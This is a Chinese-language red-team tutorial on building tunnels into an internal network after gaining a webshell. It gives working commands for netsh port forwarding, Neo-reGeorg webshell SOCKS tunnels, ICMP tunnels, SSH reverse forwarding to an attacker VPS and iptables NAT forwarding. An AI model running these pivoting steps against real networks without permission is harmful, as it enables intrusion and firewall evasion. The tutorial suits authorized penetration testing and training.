红队攻防之构建通道漫游内网

本文涉及的产品
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介: 红队攻防之构建通道漫游内网,当我们通过外网边界的一个入口点拿到Webshell后,想要在内网横 向拓展战果第一件事情就是要构建内网通道。

红队攻防之构建通道漫游内网

前言

当我们通过外网边界的一个入口点拿到Webshell后,想要在内网横 向拓展战果第一件事情就是要构建内网通道。

网络连通性测试

ICMP

#Windows
ping 114.114.114.114 -n 1
#Linux
ping 114.114.114.114 -c 1

HTTP

curl http://www.baidu.com

DNS

nslookup baidu.com

仅DNS出网可直接CS-DNS上线(这个后面的教程最近在写,后面抽时间会发出来)

读取本机代理

查看代理配置情况,连接它的代理试试

REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

是否存在Nginx反向代理

  • 找到Nginx目录
  • 查看配置文件
  • 例如某次实战中发现正反向都代理不出去,查看配置文件发现了nginx反代,直接连接公网IP代理的3389端口

反向代理

服务器能出网的情况下,反向代理可以穿透防火墙(需要上传文件)

  • CobaltStrike 自带的Socks代理
  • NPS(简单 自带Web管理页面、稳定跨平台、支持多级代理)

搭建NPS

项目地址:https://ehang-io.github.io/nps

sudo ./nps install    #安装
sudo nps start        #启动
sudo nps stop        #停止
sudo nps reload        #服务端配置文件重载

配置文件地址 /etc/nps/conf/nps.conf

#web管理端口
web_port
#web界面管理密码
web_password
#web界面管理账号
web_username
#web api密钥
auth_key
#客户端以配置文件模式启动时的密钥,设置为空表示关闭客户端配置文件连接模式
public_vkey
#获取服务端authKey时的aes加密密钥,16位
auth_crypt_key

正向转发

Windows netsh 端口转发(双网卡用)

netsh仅支持TCP协议, 适用于双网卡服务器

连接外网6666端口,就是连接到内网目标上面的3389。

启动转发

#查看现有规则
netsh interface portproxy show all

#添加转发规则
netsh interface portproxy set v4tov4 listenaddress=外网IP listenport=6666 connectaddress=内网IP connectport=3389

取消转发

#删除转发规则
netsh interface portproxy delete v4tov4 listenport=6666

#xp需要安装ipv6
netsh interface ipv6 install

Neo-reGeorg 端口复用

配合Webshell,复用目标的Web服务端口开一个Socks5代理隧道。

https://github.com/L-codes/Neo-reGeorg

python3 neoreg.py generate -k password                    #生成服务端
python3 neoreg.py -k password -u http://xx/tunnel.php    #在本地建立Socks5代理

ICMP加密隧道

适用场景 :特殊环境下ICMP流量允许出网,穿透防火墙

工具:icmptunnel

安装服务端

git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel/
make
#禁用自带的ICMP,两端都要
sysctl -w net.ipv4.icmp_echo_ignore_all=1    
#服务端以root用户监听
./icmptunnel -s                             
(ctrl-z)                                    
#挂后台
bg                                            
#给隧道接口分配一个 IP 地址
ifconfig tun0 10.0.0.1 netmask 255.255.255.0

客户端连接

./icmptunnel <server-IP>
(ctrl-z)
bg                                            
#给隧道接口分配一个 IP 地址
ifconfig tun0 10.0.0.2 netmask 255.255.255.0

现在,我们拥有一个端到端基于 ICMP 数据包的隧道,测试SSH连接

ssh root@10.0.0.1

当然也可以把远程服务器当作一个加密的 SOCKS 代理:

ssh -D 8080 -N root@10.0.0.1

浏览器设置代理 socks://10.0.0.1:8080

边界代理

Windows连接

Proxifier全局代理

Linux连接

proxychains 配合MSF使用

https://github.com/rofl0r/proxychains-ng

高权限下

Linux SSH隧道

SSH一般是允许通过防火墙的,而且传输过程是加密的

本地转发(正向)

在中转VPS上执行以下命令

ssh -CfNg -L <VPS监听端口>:<目标内网IP>:<目标端口> <(root@目标外网Web服务器,会要求输入密码)>

ssh -CfNg -L 8080:10.1.1.3:3389 root@100.100.1.100

#VPS上查看8090端口是否已经连接
netstat -tulnp | grep "8090"

#连接目标内网服务器的远程桌面
VPS-IP:8090

SSH进程的本地端口映射,将本地端口转发到远端指定机器的指定端口;

在本地监听一个端口,所有访问这个端口的流量都会通过SSH隧道传输到远端的对应端口。

远程转发(反向)

Web服务器上执行如下命令

ssh -CfNg -R <VPS的端口>:<目标内网IP>:<目标端口> <(root@VPS-IP,会要求输入密码)>

ssh -CfNg -R 8090:10.1.1.3:3389 root@192.168.0.1

访问VPS的8090端口,即可连接内网数据库服务器的3389

VPS-IP:8090

所有访问VPS的8090端口的流量都会通过SSH隧道传输到数据库服务器的3389端口

Linux iptables 端口转发

1、编辑配置文件

vi /etc/sysctl.conf
    net.ipv4.ip_forward = 1#开启IP转发

2、关闭服务

service iptables stop

3、配置规则

#需要访问的内网地址:10.1.1.11(Windows)
#内网边界web服务器:192.168.100.100(Linux)
iptables -t nat -A PREROUTING --dst 192.168.100.100 -p tcp --dport 3389 -j DNAT--to-destination 10.1.1.11:3389

iptables -t nat -A POSTROUTING --dst 10.1.1.11 -p tcp --dport 3389 -j SNAT --to-source 192.168.100.100

4、保存并重启服务

service iptables save && service iptables start

这时访问Web服务器的3389就能登录到内网机器的桌面了。

目录
相关文章
|
4月前
|
网络性能优化 定位技术 C++
跨地区远程访问如何更快、更稳、更可靠:贝锐蒲公英智能选路
贝锐蒲公英云智慧组网采用自研智能选路技术,可根据实时网络状况自动选择最优路径,大幅降低延迟并提升传输速率。相较于传统单线模式下数据必须经由单一服务器转发导致高延迟与无备份线路的问题,蒲公英通过全球分布式节点与SD-WAN技术实现了智能实时导航能力。实测显示,智能选路可使通讯延迟降低5倍、传输速率提升百倍。该技术基于多云服务商的主干网络与FullMesh架构,能自动避开拥堵路径并确保网络可用性,即使面对线路故障也能自动切换,提供更快速、稳定和可靠的跨地区远程访问体验。
113 3
跨地区远程访问如何更快、更稳、更可靠:贝锐蒲公英智能选路
|
3月前
|
监控 安全 网络安全
【网络互联新篇章】揭秘转发路由器:企业级互联网络的守护神,打造坚不可摧的信息高速公路!
【8月更文挑战第13天】转发路由器(TR)是企业级网络架构中的关键组件,实现不同网络间互联互通,提供灵活性与可靠性。TR负责路由决策、负载均衡、故障恢复及安全保障。配置涉及接口、路由协议及安全策略设定。适用于多数据中心互联、云服务接入、ISP网络核心及企业分支互联等场景。确保TR高可用性和安全性需采用冗余配置、加密传输、严格的安全策略及持续监控。
57 1
|
3月前
|
安全 网络安全 数据处理
防火墙设置难倒你?这两种组网模式轻松解决网络安全难题!
【8月更文挑战第23天】在网络安全日益重要的今天,防火墙作为关键防护设备扮演着重要角色。本文重点分析两种核心组网模式:三层路由网关模式与二层透明网桥模式。前者通过IP层处理实现内外网隔离及丰富的策略配置,增强安全性;后者以MAC地址转发,部署简便,不影响现有网络结构,适合服务不可中断的情况。通过企业升级安全防护的实际案例,展示了不同模式的应用场景及优势,并提供了三层路由网关模式的配置示例。正确选择和配置防火墙组网模式对于提高网络安全性和保证业务连续性至关重要。
73 0
“拒绝网络谣言 清朗网络环境”倡议书
“拒绝网络谣言 清朗网络环境”倡议书
1032 87
 “拒绝网络谣言 清朗网络环境”倡议书
|
5月前
|
域名解析 网络协议 定位技术
DNS自动择优:提升网络体验的新途径
DNS自动择优是智能选择最佳DNS解析路径的技术,基于网络状况、服务器负载等因素优化响应速度和稳定性。虽不增加带宽,但能减少延迟,提高访问速度,尤其在处理远距或高负载服务器时效果明显。通过选择支持该服务的DNS提供商并调整设备设置即可启用。在复杂网络环境中,DNS自动择优可提升用户体验。
|
6月前
|
网络协议 Linux 网络架构
默认网关详解:网络通信的无声守护者
【4月更文挑战第22天】
1011 3
|
6月前
|
网络协议 安全 网络安全
4. 网络安全基础与网络接入
4. 网络安全基础与网络接入
|
Web App开发 安全 前端开发
「隐语小课」可防御侧信道攻击的 TEE 运行时环境 DOVE 解读
「隐语小课」可防御侧信道攻击的 TEE 运行时环境 DOVE 解读
308 0
|
缓存 安全
二层交换机的工作原理和风险
二层交换机的工作原理和风险
124 0
|
弹性计算 Ubuntu 网络安全
在阿里云搭建基于SDN的DDoS攻击检测与防御的过程
最近有一个实验作业,是实现《基于SDN的DDoS攻击检测与防御》,便搜索了相关的资料,发现该过程可以在云虚拟机实现,经过考虑,选择了通过阿里云ECS服务器来搭建实验所需的环境。